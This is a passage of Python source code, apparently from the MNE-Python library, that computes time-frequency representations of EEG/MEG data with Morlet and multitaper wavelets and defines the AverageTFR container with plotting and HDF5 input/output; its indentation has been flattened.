Ws = morlet(sfreq, freqs, n_cycles=n_cycles, zero_mean=zero_mean)
if use_fft:
coefs = _cwt_fft(X, Ws, mode)
else:
coefs = _cwt_convolve(X, Ws, mode)
tfrs = np.empty((n_signals, n_frequencies, n_times), dtype=np.complex)
for k, tfr in enumerate(coefs):
tfrs[k] = tfr
return tfrs
def cwt(X, Ws, use_fft=True, mode='same', decim=1):
"""Compute time freq decomposition with continuous wavelet transform
Parameters
----------
X : array of shape [n_signals, n_times]
signals (one per line)
Ws : list of array
Wavelets time series
use_fft : bool
Use FFT for convolutions
mode : 'same' | 'valid' | 'full'
Convention for convolution
decim : int
Temporal decimation factor
Returns
-------
tfr : 3D array
Time Frequency Decompositions (n_signals x n_frequencies x n_times)
See Also
--------
mne.time_frequency.cwt_morlet : Compute time-frequency decomposition
with Morlet wavelets
"""
n_signals, n_times = X[:, ::decim].shape
n_frequencies = len(Ws)
if use_fft:
coefs = _cwt_fft(X, Ws, mode)
else:
coefs = _cwt_convolve(X, Ws, mode)
tfrs = np.empty((n_signals, n_frequencies, n_times), dtype=np.complex)
for k, tfr in enumerate(coefs):
tfrs[k] = tfr[..., ::decim]
return tfrs
def _time_frequency(X, Ws, use_fft, decim):
"""Aux of time_frequency for parallel computing over channels
"""
n_epochs, n_times = X.shape
n_times = n_times // decim + bool(n_times % decim)
n_frequencies = len(Ws)
psd = np.zeros((n_frequencies, n_times)) # PSD
plf = np.zeros((n_frequencies, n_times), np.complex) # phase lock
mode = 'same'
if use_fft:
tfrs = _cwt_fft(X, Ws, mode)
else:
tfrs = _cwt_convolve(X, Ws, mode)
for tfr in tfrs:
tfr = tfr[:, ::decim]
tfr_abs = np.abs(tfr)
psd += tfr_abs ** 2
plf += tfr / tfr_abs
psd /= n_epochs
plf = np.abs(plf) / n_epochs
return psd, plf
@verbose
def single_trial_power(data, sfreq, frequencies, use_fft=True, n_cycles=7,
baseline=None, baseline_mode='ratio', times=None,
decim=1, n_jobs=1, zero_mean=False, verbose=None):
"""Compute time-frequency power on single epochs
Parameters
----------
data : array of shape [n_epochs, n_channels, n_times]
The epochs
sfreq : float
Sampling rate
frequencies : array-like
The frequencies
use_fft : bool
Use the FFT for convolutions or not.
n_cycles : float | array of float
Number of cycles in the Morlet wavelet. Fixed number
or one per frequency.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal ot (None, None) all the time
interval is used.
baseline_mode : None | 'ratio' | 'zscore'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
times : array
Required to define baseline
decim : int
Temporal decimation factor
n_jobs : int
The number of epochs to process at the same time
zero_mean : bool
Make sure the wavelets are zero mean.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : 4D array
Power estimate (Epochs x Channels x Frequencies x Timepoints).
"""
mode = 'same'
n_frequencies = len(frequencies)
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
# Precompute wavelets for given frequency range to save time
Ws = morlet(sfreq, frequencies, n_cycles=n_cycles, zero_mean=zero_mean)
parallel, my_cwt, _ = parallel_func(cwt, n_jobs)
logger.info("Computing time-frequency power on single epochs...")
power = np.empty((n_epochs, n_channels, n_frequencies, n_times),
dtype=np.float)
# Package arguments for `cwt` here to minimize omissions where only one of
# the two calls below is updated with new function arguments.
cwt_kw = dict(Ws=Ws, use_fft=use_fft, mode=mode, decim=decim)
if n_jobs == 1:
for k, e in enumerate(data):
x = cwt(e, **cwt_kw)
power[k] = (x * x.conj()).real
else:
# Precompute tf decompositions in parallel
tfrs = parallel(my_cwt(e, **cwt_kw) for e in data)
for k, tfr in enumerate(tfrs):
power[k] = (tfr * tfr.conj()).real
# Run baseline correction. Be sure to decimate the times array as well if
# needed.
if times is not None:
times = times[::decim]
power = rescale(power, times, baseline, baseline_mode, copy=False)
return power
def _induced_power_cwt(data, sfreq, frequencies, use_fft=True, n_cycles=7,
decim=1, n_jobs=1, zero_mean=False):
"""Compute time induced power and inter-trial phase-locking factor
The time frequency decomposition is done with Morlet wavelets
Parameters
----------
data : array
3D array of shape [n_epochs, n_channels, n_times]
sfreq : float
sampling Frequency
frequencies : array
Array of frequencies of interest
use_fft : bool
Compute transform with fft based convolutions or temporal
convolutions.
n_cycles : float | array of float
Number of cycles. Fixed number or one per frequency.
decim: int
Temporal decimation factor
n_jobs : int
The number of CPUs used in parallel. All CPUs are used in -1.
Requires joblib package.
zero_mean : bool
Make sure the wavelets are zero mean.
Returns
-------
power : 2D array
Induced power (Channels x Frequencies x Timepoints).
Squared amplitude of time-frequency coefficients.
phase_lock : 2D array
Phase locking factor in [0, 1] (Channels x Frequencies x Timepoints)
"""
n_frequencies = len(frequencies)
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
# Precompute wavelets for given frequency range to save time
Ws = morlet(sfreq, frequencies, n_cycles=n_cycles, zero_mean=zero_mean)
psd = np.empty((n_channels, n_frequencies, n_times))
plf = np.empty((n_channels, n_frequencies, n_times))
# Separate to save memory for n_jobs=1
parallel, my_time_frequency, _ = parallel_func(_time_frequency, n_jobs)
psd_plf = parallel(my_time_frequency(data[:, c, :], Ws, use_fft, decim)
for c in range(n_channels))
for c, (psd_c, plf_c) in enumerate(psd_plf):
psd[c, :, :], plf[c, :, :] = psd_c, plf_c
return psd, plf
def _preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax, mode,
baseline, vmin, vmax, dB):
"""Aux Function to prepare tfr computation"""
from ..viz.utils import _setup_vmin_vmax
if mode is not None and baseline is not None:
logger.info("Applying baseline correction '%s' during %s" %
(mode, baseline))
data = rescale(data.copy(), times, baseline, mode)
# crop time
itmin, itmax = None, None
idx = np.where(_time_mask(times, tmin, tmax))[0]
if tmin is not None:
itmin = idx[0]
if tmax is not None:
itmax = idx[-1] + 1
times = times[itmin:itmax]
# crop freqs
ifmin, ifmax = None, None
idx = np.where(_time_mask(freqs, fmin, fmax))[0]
if fmin is not None:
ifmin = idx[0]
if fmax is not None:
ifmax = idx[-1] + 1
freqs = freqs[ifmin:ifmax]
# crop data
data = data[:, ifmin:ifmax, itmin:itmax]
times *= 1e3
if dB:
data = 10 * np.log10((data * data.conj()).real)
vmin, vmax = _setup_vmin_vmax(data, vmin, vmax)
return data, times, freqs, vmin, vmax
class AverageTFR(ContainsMixin, UpdateChannelsMixin):
"""Container for Time-Frequency data
Can for example store induced power at sensor level or intertrial
coherence.
Parameters
----------
info : Info
The measurement info.
data : ndarray, shape (n_channels, n_freqs, n_times)
The data.
times : ndarray, shape (n_times,)
The time values in seconds.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
nave : int
The number of averaged TFRs.
comment : str | None
Comment on the data, e.g., the experimental condition.
Defaults to None.
method : str | None
Comment on the method used to compute the data, e.g., morlet wavelet.
Defaults to None.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
ch_names : list
The names of the channels.
"""
@verbose
def __init__(self, info, data, times, freqs, nave, comment=None,
method=None, verbose=None):
self.info = info
if data.ndim != 3:
raise ValueError('data should be 3d. Got %d.' % data.ndim)
n_channels, n_freqs, n_times = data.shape
if n_channels != len(info['chs']):
raise ValueError("Number of channels and data size don't match"
" (%d != %d)." % (n_channels, len(info['chs'])))
if n_freqs != len(freqs):
raise ValueError("Number of frequencies and data size don't match"
" (%d != %d)." % (n_freqs, len(freqs)))
if n_times != len(times):
raise ValueError("Number of times and data size don't match"
" (%d != %d)." % (n_times, len(times)))
self.data = data
self.times = times
self.freqs = freqs
self.nave = nave
self.comment = comment
self.method = method
@property
def ch_names(self):
return self.info['ch_names']
def crop(self, tmin=None, tmax=None, copy=False):
"""Crop data to a given time interval
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
copy : bool
If False epochs is cropped in place.
"""
inst = self if not copy else self.copy()
mask = _time_mask(inst.times, tmin, tmax)
inst.times = inst.times[mask]
inst.data = inst.data[..., mask]
return inst
@verbose
def plot(self, picks=None, baseline=None, mode='mean', tmin=None,
tmax=None, fmin=None, fmax=None, vmin=None, vmax=None,
cmap='RdBu_r', dB=False, colorbar=True, show=True,
title=None, axes=None, layout=None, verbose=None):
"""Plot TFRs in a topography with images
Parameters
----------
picks : array-like of int | None
The indices of the channels to plot.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal ot (None, None) all the time
interval is used.
mode : None | 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline)).
If None no baseline correction is applied.
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
vmin : float | None
The mininum value an the color scale. If vmin is None, the data
minimum value is used.
vmax : float | None
The maxinum value an the color scale. If vmax is None, the data
maximum value is used.
cmap : matplotlib colormap | str
The colormap to use. Defaults to 'RdBu_r'.
dB : bool
If True, 20*log10 is applied to the data to get dB.
colorbar : bool
If true, colorbar will be added to the plot. For user defined axes,
the colorbar cannot be drawn. Defaults to True.
show : bool
Call pyplot.show() at the end.
title : str | None
String for title. Defaults to None (blank/no title).
axes : instance of Axes | list | None
The axes to plot to. If list, the list must be a list of Axes of
the same length as the number of channels. If instance of Axes,
there must be only one channel plotted.
layout : Layout | None
Layout instance specifying sensor positions. Used for interactive
plotting of topographies on rectangle selection. If possible, the
correct layout is inferred from the data.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz.topo import _imshow_tfr
import matplotlib.pyplot as plt
times, freqs = self.times.copy(), self.freqs.copy()
info = self.info
data = self.data
n_picks = len(picks)
info, data, picks = _prepare_picks(info, data, picks)
data = data[picks]
data, times, freqs, vmin, vmax = \
_preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax, mode,
baseline, vmin, vmax, dB)
tmin, tmax = times[0], times[-1]
if isinstance(axes, plt.Axes):
axes = [axes]
if isinstance(axes, list) or isinstance(axes, np.ndarray):
if len(axes) != n_picks:
raise RuntimeError('There must be an axes for each picked '
'channel.')
for idx in range(len(data)):
if axes is None:
fig = plt.figure()
ax = fig.add_subplot(111)
else:
ax = axes[idx]
fig = ax.get_figure()
onselect_callback = partial(self._onselect, baseline=baseline,
mode=mode, layout=layout)
_imshow_tfr(ax, 0, tmin, tmax, vmin, vmax, onselect_callback,
ylim=None, tfr=data[idx: idx + 1], freq=freqs,
x_label='Time (ms)', y_label='Frequency (Hz)',
colorbar=colorbar, picker=False, cmap=cmap)
if title:
fig.suptitle(title)
colorbar = False # only one colorbar for multiple axes
plt_show(show)
return fig
def _onselect(self, eclick, erelease, baseline, mode, layout):
"""Callback function called by rubber band selector in channel tfr."""
import matplotlib.pyplot as plt
from ..viz import plot_tfr_topomap
if abs(eclick.x - erelease.x) < .1 or abs(eclick.y - erelease.y) < .1:
return
plt.ion() # turn interactive mode on
tmin = round(min(eclick.xdata, erelease.xdata) / 1000., 5) # ms to s
tmax = round(max(eclick.xdata, erelease.xdata) / 1000., 5)
fmin = round(min(eclick.ydata, erelease.ydata), 5) # Hz
fmax = round(max(eclick.ydata, erelease.ydata), 5)
tmin = min(self.times, key=lambda x: abs(x - tmin)) # find closest
tmax = min(self.times, key=lambda x: abs(x - tmax))
fmin = min(self.freqs, key=lambda x: abs(x - fmin))
fmax = min(self.freqs, key=lambda x: abs(x - fmax))
if tmin == tmax or fmin == fmax:
logger.info('The selected area is too small. '
'Select a larger time-frequency window.')
return
types = list()
if 'eeg' in self:
types.append('eeg')
if 'mag' in self:
types.append('mag')
if 'grad' in self:
types.append('grad')
fig = figure_nobar()
fig.suptitle('{:.2f} s - {:.2f} s, {:.2f} Hz - {:.2f} Hz'.format(tmin,
tmax,
fmin,
fmax),
y=0.04)
for idx, ch_type in enumerate(types):
ax = plt.subplot(1, len(types), idx + 1)
plot_tfr_topomap(self, ch_type=ch_type, tmin=tmin, tmax=tmax,
fmin=fmin, fmax=fmax, layout=layout,
baseline=baseline, mode=mode, cmap=None,
title=ch_type, vmin=None, vmax=None,
axes=ax)
def plot_topo(self, picks=None, baseline=None, mode='mean', tmin=None,
tmax=None, fmin=None, fmax=None, vmin=None, vmax=None,
layout=None, cmap='RdBu_r', title=None, dB=False,
colorbar=True, layout_scale=0.945, show=True,
border='none', fig_facecolor='k', font_color='w'):
"""Plot TFRs in a topography with images
Parameters
----------
picks : array-like of int | None
The indices of the channels to plot. If None all available
channels are displayed.
baseline : None (default) or tuple of length 2
The time interval to apply baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal ot (None, None) all the time
interval is used.
mode : None | 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or zscore (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline)).
If None no baseline correction is applied.
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
vmin : float | None
The mininum value an the color scale. If vmin is None, the data
minimum value is used.
vmax : float | None
The maxinum value an the color scale. If vmax is None, the data
maximum value is used.
layout : Layout | None
Layout instance specifying sensor positions. If possible, the
correct layout is inferred from the data.
cmap : matplotlib colormap | str
The colormap to use. Defaults to 'RdBu_r'.
title : str
Title of the figure.
dB : bool
If True, 20*log10 is applied to the data to get dB.
colorbar : bool
If true, colorbar will be added to the plot
layout_scale : float
Scaling factor for adjusting the relative size of the layout
on the canvas.
show : bool
Call pyplot.show() at the end.
border : str
matplotlib borders style to be used for each sensor plot.
fig_facecolor : str | obj
The figure face color. Defaults to black.
font_color: str | obj
The color of tick labels in the colorbar. Defaults to white.
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz.topo import _imshow_tfr, _plot_topo
times = self.times.copy()
freqs = self.freqs
data = self.data
info = self.info
info, data, picks = _prepare_picks(info, data, picks)
data = data[picks]
data, times, freqs, vmin, vmax = \
_preproc_tfr(data, times, freqs, tmin, tmax, fmin, fmax,
mode, baseline, vmin, vmax, dB)
if layout is None:
from mne import find_layout
layout = find_layout(self.info)
onselect_callback = partial(self._onselect, baseline=baseline,
mode=mode, layout=layout)
imshow = partial(_imshow_tfr, tfr=data, freq=freqs, cmap=cmap,
onselect=onselect_callback)
fig = _plot_topo(info=info, times=times, show_func=imshow,
layout=layout, colorbar=colorbar, vmin=vmin,
vmax=vmax, cmap=cmap, layout_scale=layout_scale,
title=title, border=border, x_label='Time (ms)',
y_label='Frequency (Hz)', fig_facecolor=fig_facecolor,
font_color=font_color)
plt_show(show)
return fig
def _check_compat(self, tfr):
"""checks that self and tfr have the same time-frequency ranges"""
assert np.all(tfr.times == self.times)
assert np.all(tfr.freqs == self.freqs)
def __add__(self, tfr):
self._check_compat(tfr)
out = self.copy()
out.data += tfr.data
return out
def __iadd__(self, tfr):
self._check_compat(tfr)
self.data += tfr.data
return self
def __sub__(self, tfr):
self._check_compat(tfr)
out = self.copy()
out.data -= tfr.data
return out
def __isub__(self, tfr):
self._check_compat(tfr)
self.data -= tfr.data
return self
def copy(self):
"""Return a copy of the instance."""
return deepcopy(self)
def __repr__(self):
s = "time : [%f, %f]" % (self.times[0], self.times[-1])
s += ", freq : [%f, %f]" % (self.freqs[0], self.freqs[-1])
s += ", nave : %d" % self.nave
s += ', channels : %d' % self.data.shape[0]
return "<AverageTFR | %s>" % s
def apply_baseline(self, baseline, mode='mean'):
"""Baseline correct the data
Parameters
----------
baseline : tuple or list of length 2
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
mode : 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or z-score (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
If None, baseline no correction will be performed.
"""
self.data = rescale(self.data, self.times, baseline, mode, copy=False)
def plot_topomap(self, tmin=None, tmax=None, fmin=None, fmax=None,
ch_type=None, baseline=None, mode='mean',
layout=None, vmin=None, vmax=None, cmap=None,
sensors=True, colorbar=True, unit=None, res=64, size=2,
cbar_fmt='%1.1e', show_names=False, title=None,
axes=None, show=True, outlines='head', head_pos=None):
"""Plot topographic maps of time-frequency intervals of TFR data
Parameters
----------
tmin : None | float
The first time instant to display. If None the first time point
available is used.
tmax : None | float
The last time instant to display. If None the last time point
available is used.
fmin : None | float
The first frequency to display. If None the first frequency
available is used.
fmax : None | float
The last frequency to display. If None the last frequency
available is used.
ch_type : 'mag' | 'grad' | 'planar1' | 'planar2' | 'eeg' | None
The channel type to plot. For 'grad', the gradiometers are
collected in pairs and the RMS for each pair is plotted.
If None, then channels are chosen in the order given above.
baseline : tuple or list of length 2
The time interval to apply rescaling / baseline correction.
If None do not apply it. If baseline is (a, b)
the interval is between "a (s)" and "b (s)".
If a is None the beginning of the data is used
and if b is None then b is set to the end of the interval.
If baseline is equal to (None, None) all the time
interval is used.
mode : 'logratio' | 'ratio' | 'zscore' | 'mean' | 'percent'
Do baseline correction with ratio (power is divided by mean
power during baseline) or z-score (power is divided by standard
deviation of power during baseline after subtracting the mean,
power = [power - mean(power_baseline)] / std(power_baseline))
If None, baseline no correction will be performed.
layout : None | Layout
Layout instance specifying sensor positions (does not need to
be specified for Neuromag data). If possible, the correct layout
file is inferred from the data; if no appropriate layout file was
found, the layout is automatically generated from the sensor
locations.
vmin : float | callable | None
The value specifying the lower bound of the color range. If None,
and vmax is None, -vmax is used. Else np.min(data) or in case
data contains only positive values 0. If callable, the output
equals vmin(data). Defaults to None.
vmax : float | callable | None
The value specifying the upper bound of the color range. If None,
the maximum value is used. If callable, the output equals
vmax(data). Defaults to None.
cmap : matplotlib colormap | None
Colormap. If None and the plotted data is all positive, defaults to
'Reds'. If None and data contains also negative values, defaults to
'RdBu_r'. Defaults to None.
sensors : bool | str
Add markers for sensor locations to the plot. Accepts matplotlib
plot format string (e.g., 'r+' for red plusses). If True, a circle
will be used (via .add_artist). Defaults to True.
colorbar : bool
Plot a colorbar.
unit : dict | str | None
The unit of the channel type used for colorbar label. If
scale is None the unit is automatically determined.
res : int
The resolution of the topomap image (n pixels along each side).
size : float
Side length per topomap in inches.
cbar_fmt : str
String format for colorbar values.
show_names : bool | callable
If True, show channel names on top of the map. If a callable is
passed, channel names will be formatted using the callable; e.g.,
to delete the prefix 'MEG ' from all channel names, pass the
function lambda x: x.replace('MEG ', ''). If `mask` is not None,
only significant sensors will be shown.
title : str | None
Title. If None (default), no title is displayed.
axes : instance of Axes | None
The axes to plot to. If None the axes is defined automatically.
show : bool
Call pyplot.show() at the end.
outlines : 'head' | 'skirt' | dict | None
The outlines to be drawn. If 'head', the default head scheme will
be drawn. If 'skirt' the head scheme will be drawn, but sensors are
allowed to be plotted outside of the head circle. If dict, each key
refers to a tuple of x and y positions, the values in 'mask_pos'
will serve as image mask, and the 'autoshrink' (bool) field will
trigger automated shrinking of the positions due to points outside
the outline. Alternatively, a matplotlib patch object can be passed
for advanced masking options, either directly or as a function that
returns patches (required for multi-axis plots). If None, nothing
will be drawn. Defaults to 'head'.
head_pos : dict | None
If None (default), the sensors are positioned such that they span
the head circle. If dict, can have entries 'center' (tuple) and
'scale' (tuple) for what the center and scale of the head should be
relative to the electrode locations.
Returns
-------
fig : matplotlib.figure.Figure
The figure containing the topography.
"""
from ..viz import plot_tfr_topomap
return plot_tfr_topomap(self, tmin=tmin, tmax=tmax, fmin=fmin,
fmax=fmax, ch_type=ch_type, baseline=baseline,
mode=mode, layout=layout, vmin=vmin, vmax=vmax,
cmap=cmap, sensors=sensors, colorbar=colorbar,
unit=unit, res=res, size=size,
cbar_fmt=cbar_fmt, show_names=show_names,
title=title, axes=axes, show=show,
outlines=outlines, head_pos=head_pos)
def save(self, fname, overwrite=False):
"""Save TFR object to hdf5 file
Parameters
----------
fname : str
The file name, which should end with -tfr.h5 .
overwrite : bool
If True, overwrite file (if it exists). Defaults to false
"""
write_tfrs(fname, self, overwrite=overwrite)
def _prepare_write_tfr(tfr, condition):
"""Aux function"""
return (condition, dict(times=tfr.times, freqs=tfr.freqs,
data=tfr.data, info=tfr.info, nave=tfr.nave,
comment=tfr.comment, method=tfr.method))
def write_tfrs(fname, tfr, overwrite=False):
"""Write a TFR dataset to hdf5.
Parameters
----------
fname : string
The file name, which should end with -tfr.h5
tfr : AverageTFR instance, or list of AverageTFR instances
The TFR dataset, or list of TFR datasets, to save in one file.
Note. If .comment is not None, a name will be generated on the fly,
based on the order in which the TFR objects are passed
overwrite : bool
If True, overwrite file (if it exists). Defaults to False.
See Also
--------
read_tfrs
Notes
-----
.. versionadded:: 0.9.0
"""
out = []
if not isinstance(tfr, (list, tuple)):
tfr = [tfr]
for ii, tfr_ in enumerate(tfr):
comment = ii if tfr_.comment is None else tfr_.comment
out.append(_prepare_write_tfr(tfr_, condition=comment))
write_hdf5(fname, out, overwrite=overwrite, title='mnepython')
def read_tfrs(fname, condition=None):
"""
Read TFR datasets from hdf5 file.
Parameters
----------
fname : string
The file name, which should end with -tfr.h5 .
condition : int or str | list of int or str | None
The condition to load. If None, all conditions will be returned.
Defaults to None.
See Also
--------
write_tfrs
Returns
-------
tfrs : list of instances of AverageTFR | instance of AverageTFR
Depending on `condition` either the TFR object or a list of multiple
TFR objects.
Notes
-----
.. versionadded:: 0.9.0
"""
check_fname(fname, 'tfr', ('-tfr.h5',))
logger.info('Reading %s ...' % fname)
tfr_data = read_hdf5(fname, title='mnepython')
for k, tfr in tfr_data:
tfr['info'] = Info(tfr['info'])
if condition is not None:
tfr_dict = dict(tfr_data)
if condition not in tfr_dict:
keys = ['%s' % k for k in tfr_dict]
raise ValueError('Cannot find condition ("{0}") in this file. '
'I can give you "{1}""'
.format(condition, " or ".join(keys)))
out = AverageTFR(**tfr_dict[condition])
else:
out = [AverageTFR(**d) for d in list(zip(*tfr_data))[1]]
return out
@verbose
def tfr_morlet(inst, freqs, n_cycles, use_fft=False,
return_itc=True, decim=1, n_jobs=1, picks=None, verbose=None):
"""Compute Time-Frequency Representation (TFR) using Morlet wavelets
Parameters
----------
inst : Epochs | Evoked
The epochs or evoked object.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
use_fft : bool
The fft based convolution or not.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
Must be ``False`` for evoked data.
decim : int
The decimation factor on the time axis. To reduce memory usage.
n_jobs : int
The number of jobs to run in parallel.
picks : array-like of int | None
The indices of the channels to plot. If None all available
channels are displayed.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : instance of AverageTFR
The averaged power.
itc : instance of AverageTFR
The intertrial coherence (ITC). Only returned if return_itc
is True.
See Also
--------
tfr_multitaper, tfr_stockwell
"""
data = _get_data(inst, return_itc)
info = inst.info
info, data, picks = _prepare_picks(info, data, picks)
data = data = data[:, picks, :]
power, itc = _induced_power_cwt(data, sfreq=info['sfreq'],
frequencies=freqs,
n_cycles=n_cycles, n_jobs=n_jobs,
use_fft=use_fft, decim=decim,
zero_mean=True)
times = inst.times[::decim].copy()
nave = len(data)
out = AverageTFR(info, power, times, freqs, nave, method='morlet-power')
if return_itc:
out = (out, AverageTFR(info, itc, times, freqs, nave,
method='morlet-itc'))
return out
def _prepare_picks(info, data, picks):
if picks is None:
picks = pick_types(info, meg=True, eeg=True, ref_meg=False,
exclude='bads')
if np.array_equal(picks, np.arange(len(data))):
picks = slice(None)
else:
info = pick_info(info, picks)
return info, data, picks
@verbose
def _induced_power_mtm(data, sfreq, frequencies, time_bandwidth=4.0,
use_fft=True, n_cycles=7, decim=1, n_jobs=1,
zero_mean=True, verbose=None):
"""Compute time induced power and inter-trial phase-locking factor
The time frequency decomposition is done with DPSS wavelets
Parameters
----------
data : np.ndarray, shape (n_epochs, n_channels, n_times)
The input data.
sfreq : float
sampling Frequency
frequencies : np.ndarray, shape (n_frequencies,)
Array of frequencies of interest
time_bandwidth : float
Time x (Full) Bandwidth product.
The number of good tapers (low-bias) is chosen automatically based on
this to equal floor(time_bandwidth - 1). Default is 4.0 (3 tapers).
use_fft : bool
Compute transform with fft based convolutions or temporal
convolutions. Defaults to True.
n_cycles : float | np.ndarray shape (n_frequencies,)
Number of cycles. Fixed number or one per frequency. Defaults to 7.
decim: int
Temporal decimation factor. Defaults to 1.
n_jobs : int
The number of CPUs used in parallel. All CPUs are used in -1.
Requires joblib package. Defaults to 1.
zero_mean : bool
Make sure the wavelets are zero mean. Defaults to True.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : np.ndarray, shape (n_channels, n_frequencies, n_times)
Induced power. Squared amplitude of time-frequency coefficients.
itc : np.ndarray, shape (n_channels, n_frequencies, n_times)
Phase locking value.
"""
n_epochs, n_channels, n_times = data[:, :, ::decim].shape
logger.info('Data is %d trials and %d channels', n_epochs, n_channels)
n_frequencies = len(frequencies)
logger.info('Multitaper time-frequency analysis for %d frequencies',
n_frequencies)
# Precompute wavelets for given frequency range to save time
Ws = _dpss_wavelet(sfreq, frequencies, n_cycles=n_cycles,
time_bandwidth=time_bandwidth, zero_mean=zero_mean)
n_taps = len(Ws)
logger.info('Using %d tapers', n_taps)
n_times_wavelets = Ws[0][0].shape[0]
if n_times <= n_times_wavelets:
warnings.warn("Time windows are as long or longer than the epoch. "
"Consider reducing n_cycles.")
psd = np.zeros((n_channels, n_frequencies, n_times))
itc = np.zeros((n_channels, n_frequencies, n_times))
parallel, my_time_frequency, _ = parallel_func(_time_frequency,
n_jobs)
for m in range(n_taps):
psd_itc = parallel(my_time_frequency(data[:, c, :],
Ws[m], use_fft, decim)
for c in range(n_channels))
for c, (psd_c, itc_c) in enumerate(psd_itc):
psd[c, :, :] += psd_c
itc[c, :, :] += itc_c
psd /= n_taps
itc /= n_taps
return psd, itc
@verbose
def tfr_multitaper(inst, freqs, n_cycles, time_bandwidth=4.0,
use_fft=True, return_itc=True, decim=1, n_jobs=1,
picks=None, verbose=None):
"""Compute Time-Frequency Representation (TFR) using DPSS wavelets
Parameters
----------
inst : Epochs | Evoked
The epochs or evoked object.
freqs : ndarray, shape (n_freqs,)
The frequencies in Hz.
n_cycles : float | ndarray, shape (n_freqs,)
The number of cycles globally or for each frequency.
The time-window length is thus T = n_cycles / freq.
time_bandwidth : float, (optional)
Time x (Full) Bandwidth product. Should be >= 2.0.
Choose this along with n_cycles to get desired frequency resolution.
The number of good tapers (least leakage from far away frequencies)
is chosen automatically based on this to floor(time_bandwidth - 1).
Default is 4.0 (3 good tapers).
E.g., With freq = 20 Hz and n_cycles = 10, we get time = 0.5 s.
If time_bandwidth = 4., then frequency smoothing is (4 / time) = 8 Hz.
use_fft : bool
The fft based convolution or not.
Defaults to True.
return_itc : bool
Return intertrial coherence (ITC) as well as averaged power.
Defaults to True.
decim : int
The decimation factor on the time axis. To reduce memory usage.
Note than this is brute force decimation, no anti-aliasing is done.
Defaults to 1.
n_jobs : int
The number of jobs to run in parallel. Defaults to 1.
picks : array-like of int | None
The indices of the channels to plot. If None all available
channels are displayed.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
power : AverageTFR
The averaged power.
itc : AverageTFR
The intertrial coherence (ITC). Only returned if return_itc
is True.
See Also
--------
tfr_multitaper, tfr_stockwell
Notes
-----
.. versionadded:: 0.9.0
"""
data = _get_data(inst, return_itc)
info = inst.info
info, data, picks = _prepare_picks(info, data, picks)
data = data = data[:, picks, :]
power, itc = _induced_power_mtm(data, sfreq=info['sfreq'],
frequencies=freqs, n_cycles=n_cycles,
time_bandwidth=time_bandwidth,
use_fft=use_fft, decim=decim,
n_jobs=n_jobs, zero_mean=True,
verbose='INFO')
times = inst.times[::decim].copy()
nave = len(data)
out = AverageTFR(info, power, times, freqs, nave,
method='mutlitaper-power')
if return_itc:
out = (out, AverageTFR(info, itc, times, freqs, nave,
method='mutlitaper-itc'))
return out
def combine_tfr(all_tfr, weights='nave'):
"""Merge AverageTFR data by weighted addition
Create a new AverageTFR instance, using a combination of the supplied
instances as its data. By default, the mean (weighted by trials) is used.
Subtraction can be performed by passing negative weights (e.g., [1, -1]).
Data must have the same channels and the same time instants.
Parameters
----------
all_tfr : list of AverageTFR
The tfr datasets.
weights : list of float | str
The weights to apply to the data of each AverageTFR instance.
Can also be ``'nave'`` to weight according to tfr.nave,
or ``'equal'`` to use equal weighting (each weighted as ``1/N``).
Returns
-------
tfr : AverageTFR
The new TFR data.
Notes
-----
.. versionadded:: 0.11.0
"""
tfr = all_tfr[0].copy()
if isinstance(weights, string_types):
if weights not in ('nave', 'equal'):
raise ValueError('Weights must be a list of float, or "nave" or '
